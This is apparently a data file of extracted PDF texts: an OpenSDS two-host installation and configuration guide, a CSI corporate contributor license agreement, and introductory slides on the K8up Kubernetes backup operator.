18 \n Check OpenSDS CLI Tool ............................................................................................... 18 \n Check OpenSDS Dashboard ........................................................................................... 18 3 Uninstallation ..................................................................................................... 19 4 Appendix ............................................................................................................. 19 \n Port matrix used in OpenSDS ......................................................................................... 19 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 1 1 System requirements 1.1 Hardware The hardware requirements are described in this section. For array-based replication, two physical servers and two Dorado arrays are needed. For host-based replication, two physical servers are needed. For other tests described in this POC, one physical server or one VM can be used for basic testing. 1.2 Software The software requirements are described in this section. \n OS Ubuntu 16.04.3 has been used during the testing and therefore should be used in this POC: root@proxy:~# cat /etc/issue Ubuntu 16.04.3 LTS \\n \\l For user of OS, please use root user to install OpenSDS. For host-based replication, required DRBD software is described in the relevant section later. Other required software is described in the installation section. 2 Installation To test Kubernetes, OpenStack, Host-based or Array-based Replication, this section describes how to install OpenSDS in two host nodes. See the following diagram for a summary of deployment. In the following installation process, we will refer to some of the information in the diagram (such as host name, host IP address, storage IP address, etc.) to express the installation process in more detail. In order to manage storage device, in OpenSDS you only need to configure one of the controllers of storage device if it has two controllers (such as Controller A and B). When you install OpenSDS, please refer to the actual networking. The distributed storage (such as Ceph, OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 2 FusionStorage) has different IP network configuration, please refer to your actual environment. 
\n 2.1 Prerequisite for two hosts \n Packages Install following packages: apt-get install -y git curl wget libltdl7 libseccomp2 librados2 ceph-common \n Golang You can install golang by executing commands blow: wget https://storage.googleapis.com/golang/go1.11.2.linux-amd64.tar.gz tar -C /usr/local -xzf go1.11.2.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> /etc/profile echo 'export GOPATH=$HOME/gopath' >> /etc/profile mkdir –p ~/gopath source /etc/profile Check golang version information: root@proxy:~# go version go version go1.11.2 linux/amd64 \nOpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 3 \n Docker Install docker: # Download and install docker ce 18.03 wget https://download.docker.com/linux/ubuntu/dists/xenial/pool/stable/amd64/docker-ce_18.03.1~ce-0~ubuntu_amd64.deb dpkg -i docker-ce_18.03.1~ce-0~ubuntu_amd64.deb Version information: root@opensds-primary:~# docker version Client: Version: 18.03.1-ce API version: 1.37 Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:17:20 2018 OS/Arch: linux/amd64 Experimental: false Orchestrator: swarm Server: Engine: Version: 18.03.1-ce API version: 1.37 (minimum version 1.12) Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:15:30 2018 OS/Arch: linux/amd64 Experimental: false \n Docker-compose Install docker-compose: curl -L \"https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)\" -o /usr/local/bin/docker-compose chmod +x /usr/local/bin/docker-compose Version information: docker-compose version docker-compose version 1.23.1, build b02f1306 docker-py version: 3.5.0 CPython version: 3.6.7 OpenSSL version: OpenSSL 1.1.0f 25 May 2017 \n Ansible To install ansible, run the commands below: add-apt-repository ppa:ansible/ansible-2.4 apt-get update OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 4 apt-get install -y ansible # Check ansible version, 2.4.x is required. ansible --version \n DRBD Run command blow to install drbd service: add-apt-repository ppa:linbit/linbit-drbd9-stack apt-get update apt-get install drbd-utils python-drbdmanage drbd-dkms Check verion information: drbdmanage --version drbdmanage 0.99.18; GIT-hash: 2bca8c7874462285e1b499c662e52a66f3844403 2.2 Deployment on host 1 \n OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. 2.2.1.1 Download opensds-installer code cd $HOME git clone -b stable/bali https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible 2.2.1.2 Configure OpenSDS cluster variables 2.2.1.2.1 System environment Change host_ip to the actual IP address (e.g. 192.168.2.2) in group_vars/common.yml: # This field indicates local machine host ip host_ip: 127.0.0.1 Modify the host and port of etcd in group_vars/osdsdb.yml. To eliminate the conflict with kubernetes, you should change the etc_host to actual IP address (e.g. 192.168.2.2) and change etcd_port and etcd_peer_port to new ports, such as 2479 and 2480. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 5 etcd_host: 192.168.2.2 etcd_port: 2479 etcd_peer_port: 2480 2.2.1.2.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address (e.g. 
192.168.2.2): tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 2.2.1.2.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 2.2.1.2.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 6 2.2.1.3 Check if the hosts can be reached ansible all -m ping -i local.hosts 2.2.1.4 Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts \n Configure FusionStorage Backend FusionStorage installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using FusionStorage as the backend, you should configure it manually. 1. Add FusionStorage backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_fusionstorage # ... [huawei_fusionstorage] name = fusionstorage backend description = This is a fusionstorage backend service driver_name = huawei_fusionstorage config_path = /etc/opensds/driver/fusionstorage.yaml 2. Add FusionStorage backend configuration to /etc/opensds/driver/dorado.yaml, please confirm whether the fmIp and fsaIp are correct. authOptions: fmIp: 192.168.3.4 fsaIp: - 192.168.3.4 pool: 0: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 7 ioConnectivity: accessProtocol: DSWARE maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 3ms 3. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock \n Configure Dorado Storage Backend Dorado installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using dorado as the backend, you should configure it manually. 4. Add dorado backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_dorado host_based_replication_driver = drbd # ... 
[huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml # OpenSDS will support array-based replication when support_replication = true, # OpenSDS will support host-based replication when support_replication = false support_replication = true OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 8 5. Add dorado backend configuration to /etc/opensds/driver/dorado.yaml authOptions: endpoints: \"https://196.168.3.4:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true replication: authOptions: endpoints: \"https://196.168.3.5:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true pool: # Dorado pool that you want to provide to opensds. StoragePool001: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 # The ETH ip that you configure in for iSCSI. targetIp: 193.151.3.4 If you want change the storage networking protcol to FC, please replace the iscsi with fibre_channel. 6. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 9 \n Configure Host-based replication Currently, OpenSDS can only support one type of replication at a time, therefore if you want to test host-based replication please confirm the parameter 'support_replication' is false, as described in Section 2.2.2. We recommend that you configure and test host-based replication after testing array-based replication. 1. Add drbd configuration for opensds drbd driver. vi /etc/opensds/drbd.yaml #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: opensds-secondary # hostname of host 2 IP: 192.168.2.3 Node-ID: 1 - Hostname: opensds-primary # hostname of host 1 IP: 192.168.2.2 Node-ID: 0 2. Add /etc/opensds/attacher.conf [osdsdock] api_endpoint = 192.168.2.2:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.2.2 dock_type = attacher [database] endpoint = 192.168.2.2:2479, 192.168.2.2:2480 driver = etcd 3. 
Startup the osdsdock(attacher) # Start attacher osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --config-file /etc/opensds/attacher.conf --daemon # Check attacher osdsdock ps -ef | grep osdsdock OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 10 \n Kubernetes Local Cluster Deployment 2.2.5.1 Install Etcd You can install etcd by executing commands blow: cd $HOME wget https://github.com/coreos/etcd/releases/download/v3.3.0/etcd-v3.3.0-linux-amd64.tar.gz tar -xzf etcd-v3.3.0-linux-amd64.tar.gz cd etcd-v3.3.0-linux-amd64 sudo cp -f etcd etcdctl /usr/local/bin/ 2.2.5.2 kubernetes local cluster You can start the latest k8s local cluster by executing commands blow: cd $HOME git clone https://github.com/kubernetes/kubernetes.git cd $HOME/kubernetes git checkout v1.13.0 make echo alias kubectl='$HOME/kubernetes/cluster/kubectl.sh' >> /etc/profile ALLOW_PRIVILEGED=true FEATURE_GATES=CSIPersistentVolume=true,MountPropagation=true,VolumeSnapshotDataSource=true,KubeletPluginsWatcher=true RUNTIME_CONFIG=\"storage.k8s.io/v1alpha1=true\" LOG_LEVEL=5 hack/local-up-cluster.sh \n CSI Plugin Deployment 2.2.6.1 Download nbp source code git clone -b stable/bali https://github.com/opensds/nbp.git cd nbp 2.2.6.2 Configure CSI Plugin configmap Configure OpenSDS endpoint and Keystone IP address. vi csi/server/deploy/kubernetes/csi-configmap-opensdsplugin.yaml The IP (127.0.0.1) should be replaced with the opensds and identity actual endpoint IP (e.g. 192.168.2.2). kind: ConfigMap apiVersion: v1 metadata: name: csi-configmap-opensdsplugin data: opensdsendpoint: http://127.0.0.1:50040 osauthurl: http://127.0.0.1/identity OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 11 2.2.6.3 Install CSI Plugin Use kubectl command to create OpenSDS CSI pods: kubectl create -f csi/server/deploy/kubernetes After this, three pods can be found by kubectl get pods like below: • csi-provisioner-opensdsplugin • csi-attacher-opensdsplugin • csi-nodeplugin-opensdsplugin • csi-snapshotter-opensdsplugin 2.3 Deployment on host 2 \n OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. 2.3.1.1 Download opensds-installer code cd $HOME git clone -b stable/bali https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible 2.3.1.2 Configure OpenSDS cluster variables 2.3.1.2.1 System environment Change host_ip to the actual IP address (e.g. 192.168.2.3) in group_vars/common.yml: # This field indicates local machine host ip host_ip: 127.0.0.1 Then, set opensds_auth_strategy as noauth in group_vars/auth.yml # OpenSDS authentication strategy, support 'noauth' and 'keystone'. opensds_auth_strategy: noauth Modify the host and port of etcd in group_vars/osdsdb.yml. To eliminate the conflict with kubernetes, you should change the etc_host to actual IP address of Host 1 (e.g. 192.168.2.2) and change etcd_port and etcd_peer_port to new ports, such as 2479 and 2480. etcd_host: 192.168.2.2 etcd_port: 2479 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 12 etcd_peer_port: 2480 2.3.1.2.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address (e.g. 
192.168.2.3): tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 2.3.1.2.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 2.3.1.2.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 13 2.3.1.3 Check if the hosts can be reached ansible all -m ping -i local.hosts 2.3.1.4 Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts \n Configure FusionStorage Backend FusionStorage installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using FusionStorage as the backend, you should configure it manually. 1. Add FusionStorage backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_fusionstorage # ... [huawei_fusionstorage] name = fusionstorage backend description = This is a fusionstorage backend service driver_name = huawei_fusionstorage config_path = /etc/opensds/driver/fusionstorage.yaml 2. Add FusionStorage backend configuration to /etc/opensds/driver/dorado.yaml, please confirm whether the fmIp and fsaIp are correct. authOptions: fmIp: 192.168.3.5 fsaIp: - 192.168.3.5 pool: 0: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 14 ioConnectivity: accessProtocol: DSWARE maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 3ms \n Configure Dorado Storage Backend Dorado installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using dorado as the backend, you should configure it manually. 1. Add dorado backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_dorado host_based_replication_driver = drbd # ... [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml # OpenSDS will support array-based replication when support_replication = true, # OpenSDS will support host-based replication when support_replication = false support_replication = true 2. 
Add dorado backend configuration to /etc/opensds/driver/dorado.yaml authOptions: endpoints: \"https://196.168.3.5:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true replication: authOptions: endpoints: \"https://196.168.3.4:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 15 pool: # Dorado pool that you want to provide to opensds. StoragePool001: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 # The ETH ip that you configure in for iSCSI. targetIp: 193.151.3.5 If you want change the storage networking protcol to FC, please replace the iscsi with fibre_channel. 3. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock \n Configure Host-based replication Currently, OpenSDS can only support one type of replication at a time, therefore if you want to test host-based replication please confirm the parameter 'support_replication' is false, as described in Section 2.3.2. We recommend that you configure and test host-based replication after testing array-based replication. 1. Add drbd configuration for opensds drbd driver. vi /etc/opensds/drbd.yaml #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 16 #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: opensds-secondary # hostname of host 2 IP: 192.168.2.3 Node-ID: 1 - Hostname: opensds-primary # hostname of host 1 IP: 192.168.2.2 Node-ID: 0 2. Add /etc/opensds/attacher.conf [osdsdock] api_endpoint = 192.168.2.3:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.2.3 dock_type = attacher [database] endpoint = 192.168.2.2:2479, 192.168.2.2:2480 driver = etcd 3. Startup the osdsdock(attacher) # Start attacher osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --config-file /etc/opensds/attacher.conf --daemon # Check attacher osdsdock ps -ef | grep osdsdock \n Devstack(Openstack) Deployment 2.3.5.1 Install OpenStack using devstack The Cinder Compatible API only supports cinder's current Api(v3). You can use devstack to install cinder when testing, but in order to use cinder's current Api(v3), branch for devstack must be stable/queens. You can reference this document to install devstack(OpenStack). https://docs.openstack.org/devstack/latest/ OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 17 \n Configure Cinder Compatible API in OpenSDS Cinder Compatible API adapter is not built in as part of the ansible deployment tool. Please confirm that OS user is root, not stack. Follow the following instruction to install it. 2.3.6.1 Installation 1. Initialize OpenStack environment variables. source /opt/stack/devstack/openrc admin admin export OS_VOLUME_API_VERSION=3 2. Change the \"cinderv3\" endpoint so that OpenStack can access the cinder compatible api. Then export OPENSDS_ENDPOINT and CINDER_ENDPOINT. 
# Find the <endpoint-id> of cinderv3 openstack endpoint list # Update cinderv3 endpoint, the ip is the actual ip address of host2 openstack endpoint set <endpoint-id> --url ‘http:// 192.168.2.3:8777/v3/$(project_id)s’ # Export OPENSDS_ENDPOINT and CINDER_ENDPOINT export OPENSDS_ENDPOINT=http://192.168.2.3:50040 export CINDER_ENDPOINT=http://192.168.2.3:8777/v3 3. Compatible api code, build and run it. cd $GOPATH/src/github.com/opensds/opensds # Building go build -o ./build/out/bin/cindercompatibleapi github.com/opensds/opensds/contrib/cindercompatibleapi # Run cinder compatible api service setsid ./build/out/bin/cindercompatibleapi 4. Check cinder compatible api. cinder type-list OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 18 2.4 Check OpenSDS \n Check OpenSDS CLI Tool Configure OpenSDS CLI tool on host 1: cp /opt/opensds-hotpot-linux-amd64/bin/osdsctl /usr/local/bin export OPENSDS_ENDPOINT=http://{your_real_host_ip}:50040 export OPENSDS_AUTH_STRATEGY=keystone source /opt/stack/devstack/openrc admin admin osdsctl pool list # Check if the pool resource is available Create a default profile: osdsctl profile create '{\"name\": \"default\", \"description\": \"default policy\"}' Create a volume: osdsctl volume create 1 --name=test-001 List all volumes: osdsctl volume list Delete the volume: osdsctl volume delete <your_volume_id> \n Check OpenSDS Dashboard OpenSDS UI dashboard is available at http://{your_host1_ip}:8088 on host1, please login the dashboard using the default admin credentials: admin/opensds@123. Create tenant, user, and profiles as admin. Multi-Cloud service is also supported by dashboard. Logout of the dashboard as admin and login the dashboard again as a non-admin user to manage storage resource: • Volume Service • Create volume • Create snapshot • Expand volume size • Create volume from snapshot • Create volume group Multi Cloud Service OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 19 • Register object storage backend • Create bucket • Upload object • Download object • Migrate objects based on bucket across cloud 3 Uninstallation Log in to the two hosts, respectively, do the following steps: Run opensds-ansible playbook to clean the environment. cd opensds-installer/ansible ansible-playbook clean.yml -i local.hosts Run ceph-ansible playbook to clean ceph cluster if ceph is deployed (optional). cd /opt/ceph-ansible sudo ansible-playbook infrastructure-playbooks/purge-cluster.yml -i ceph.hosts In addition, clean up the logical partition on the physical block device used by ceph, using the fdisk tool. And remove ceph-ansible source code (optional). sudo rm -rf /opt/ceph-ansible 4 Appendix \n Port matrix used in OpenSDS Port Service Description config file 50040 osdslet API server default port number path: opensds-installer/ansible/group_vars/hotpot.yml item: controller_endpoint: \"{{ host_ip }}:50040\" OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 20 50050 osdsdock Osdsdock grpc default port nubmer path: opensds-installer/ansible/group_vars/hotpot.yml item: dock_endpoint: localhost:50050 2379 etcd ETCD port path: opensds-installer/ansible/group_vars/osdsdb.yml item: etcd_port: 2379 2380 etcd ETCD port path: opensds-installer/ansible/group_vars/osdsdb.yml item: etcd_peer_port: 2380 8088 dashbord Dashbord service port using nginx Not support 80 keystone Keystone service port using apache Not support 11211 memcache Memcache service which is used by keystone. Not support 3306 mysql Memcache service which is used by keystone. 
Not support 3260 iscsi-target If you use lvm as the Not support OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 21 storage backend, iscsi-target will be used to providing volume to host. 8089 multi-cloud-api Mult-Cloud API server default port number Not support \n27017 mongodb Mongodb port nubmer which is used by multi-cloud Not support \n9092 kafka Kafka port nubmer which is used by multi-cloud Not support \n2181 zookeeper zookeeper port nubmer which is used by kafka Not support OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 22 8776 cinder Cinder API service port number Not support 5672 rabbitmq Rabbitmq service port number which is used by cinder Not support 8080 ceph radosgw Ceph radosgw civetweb port path: opensds-installer/ansible/group_vars/ceph/all.yml item: radosgw_civetweb_port: 8080 6789 ceph mon Ceph monitor services Not support 6800:7300 ceoh osd Ceph OSD services bind to ports within the 6800:7300 range Not support " } ]
{ "category": "Runtime", "file_name": "Cosmos.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "CloudServer\nCosmos\nNFS\nor\nSMB/CIFS\nREST\nS3" } ]
{ "category": "Runtime", "file_name": "CCLA.pdf", "project_name": "Container Storage Interface (CSI)", "subcategory": "Cloud Native Storage" }
[ { "data": " Container Storage Interface Software Grant and Corporate Contributor License Agreement (“Agreement”) v1.0 This Corporate Contributor License Agreement allows an entity (the \"Corporation\") to submit Contributions to the signatory parties (“CSI Project Maintainers”) of the Letter of Intent: CSI Project, dated February 28, 2018 (“Letter”), to authorize Contributions submitted by its designated employees to the CSI Project Maintainers, and to grant copyright and patent licenses thereto. Corporation name: ________________________________________________ Corporation address: ________________________________________________ ________________________________________________ ________________________________________________ Point of Contact: ________________________________________________ E-Mail: ________________________________________________ Telephone: _____________________ Fax: _____________________ You accept and agree to the following terms and conditions for Your present and future Contributions submitted to the CSI Project Maintainers. Except for the license granted herein to the CSI Project Maintainers and recipients of software distributed by the CSI Project Maintainers, You reserve all right, title, and interest in and to Your Contributions. 1. Definitions. \"You\" (or \"Your\") shall mean the copyright owner or legal entity authorized by the copyright owner that is making this Agreement with the CSI Project Maintainers. For legal entities, the entity making a Contribution and all other entities that control, are controlled by, or are under common control with that entity are considered to be a single Contributor. For the purposes of this definition, \"control\" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. \"Contribution\" shall mean any original work of authorship, including any modifications or additions to an existing work, that is intentionally submitted by You to the CSI Project Maintainers for inclusion in, or documentation of the CSI Project (as described in the Letter) managed by the CSI Project Maintainers (the \"Work\"). For the purposes of this definition, \"submitted\" means any form of electronic, verbal, or written communication sent to the CSI Project Maintainers or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the CSI Project Maintainers for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by You as \"Not a Contribution.\" 2. Grant of Copyright License. Subject to the terms and conditions of this Agreement, You hereby grant to the CSI Project Maintainers and to recipients of software distributed by the CSI Project Maintainers a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Your Contributions and such derivative works. 3. Grant of Patent License. 
Subject to the terms and conditions of this Agreement, You hereby grant to the CSI Project Maintainers and to recipients of software distributed by the CSI Project Maintainers a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by You that are necessarily infringed by Your Contribution(s) alone or by combination of Your Contribution(s) with the Work to which such Contribution(s) were submitted. If any entity institutes patent litigation against You or any other entity (including a cross-claim or counterclaim in a lawsuit) alleging that your Contribution, or the Work to which you have contributed, constitutes direct or contributory patent infringement, then any patent licenses granted to that entity under this Agreement for that Contribution or Work shall terminate as of the date such litigation is filed. 4. You represent that You are legally entitled to grant the above license. You represent further that each employee of the Corporation designated on Schedule A below (or in a subsequent written modification to that Schedule) is authorized to submit Contributions on behalf of the Corporation. 5. You represent that each of Your Contributions is Your original creation (see section 7 for submissions on behalf of others). 6. You are not expected to provide support for Your Contributions, except to the extent You desire to provide support. You may provide support for free, for a fee, or not at all. Unless required by applicable law or agreed to in writing, You provide Your Contributions on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. 7. Should You wish to submit work that is not Your original creation, You may submit it to the CSI Project Maintainers separately from any Contribution, identifying the complete details of its source and of any license or other restriction (including, but not limited to, related patents, trademarks, and license agreements) of which you are personally aware, and conspicuously marking the work as \"Submitted on behalf of a third-party: [named here]\". 8. It is your responsibility to notify the CSI Project Maintainers when any change is required to the list of designated employees authorized to submit Contributions on behalf of the Corporation, or to the Corporation's Point of Contact with the CSI Project Maintainers. Please sign: __________________________________ Date: _______________ Title: __________________________________ Corporation: __________________________________ Schedule A [Initial list of designated employees. NB: authorization is not tied to particular Contributions.] " } ]
{ "category": "Runtime", "file_name": "slides.pdf", "project_name": "K8up", "subcategory": "Cloud Native Storage" }
[ { "data": "VSHN – The DevOps Company         \nAdrian Kosmaczewski, Developer RelationsIntroduction to K8up\nFebruary 23rd, 2023\n1VSHN – The DevOps Company  2VSHN – The DevOps Company  Répétez avec moi: /keɪtæpp/\n3VSHN – The DevOps Company  4VSHN – The DevOps Company  Backup as a ServiceBaaS\n5VSHN – The DevOps Company  A Backup Operator for Kubernetes & OpenShift\nUsed internally at VSHN since 2018\nUses under the hood\nCurrent version: 2.5.3 (February 17th, 2023)\nk8up.io and github.com/k8up-ioWhat is K8up?\nrestic\n6VSHN – The DevOps Company  K8up is a CNCF Sandbox project since November 2021\n7VSHN – The DevOps Company  Any S3-compatible backend\nAny restic-compatible backendWhere does it store backups?\n8VSHN – The DevOps Company  K8up backs all PVCs in the same namespace\n1. Create backup credentials\n2. Trigger a backup or set up a backup schedule\n3. No step 3!How does it work?\n9VSHN – The DevOps Company  1Annotation required for K8up1. PVC Resource\nkind: PersistentVolumeClaim \napiVersion: v1 \nmetadata: \n name: app-data \n labels: \n app.kubernetes.io/name: demo-app \n annotations: \n k8up.io/backup: \"true\" \nspec: \n accessModes: \n - ReadWriteOnce \n resources: \n requests: \n storage: \"1Gi\"1\n10VSHN – The DevOps Company  1A really secure password!2. Backup Credentials\napiVersion: v1 \nkind: Secret \nmetadata: \n name: backup-repo \ntype: Opaque \nstringData: \n password: p@ssw0rd 1\n11VSHN – The DevOps Company  1A backup every minute!apiVersion: k8up.io/v1 \nkind: Schedule \nmetadata: \n name: schedule-test \nspec: \n failedJobsHistoryLimit: 2 \n successfulJobsHistoryLimit: 2 \n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY \n backup: \n schedule: '*/1 * * * *' \n failedJobsHistoryLimit: 2 \n successfulJobsHistoryLimit: 21\n12VSHN – The DevOps Company  Backend Object\n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY\n13VSHN – The DevOps Company  \nt w i t t e r . 
